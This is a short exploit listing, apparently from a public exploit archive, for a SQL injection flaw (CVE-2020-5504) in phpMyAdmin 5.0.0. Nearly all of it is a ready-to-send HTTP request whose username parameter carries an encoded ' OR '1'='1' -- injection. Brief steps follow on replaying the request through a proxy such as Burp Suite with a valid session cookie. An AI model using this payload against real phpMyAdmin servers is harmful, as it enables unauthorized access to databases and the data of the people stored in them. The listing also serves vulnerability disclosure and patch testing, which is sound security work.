Share
## https://sploitus.com/exploit?id=PACKETSTORM:212378
# Exploit Title: phpMyAdmin 5.0.0 - SQL Injection
    # Date: 2025-11-25
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/
    # Software Link: https://github.com/phpmyadmin/phpmyadmin/
    # Version: 5.0.0 
    # Tested on: Windows
    # CVE : CVE-2020-5504
    
    
    Proof Of Concept
    GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
    Host: phpmyadmin
    Connection: close
    
    # Additional conditions:
    # - The attacker must have a valid MySQL account to access the server.
    
    
    Steps to Reproduce
    Log in phpmyadmin.
    Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
    Observe the result.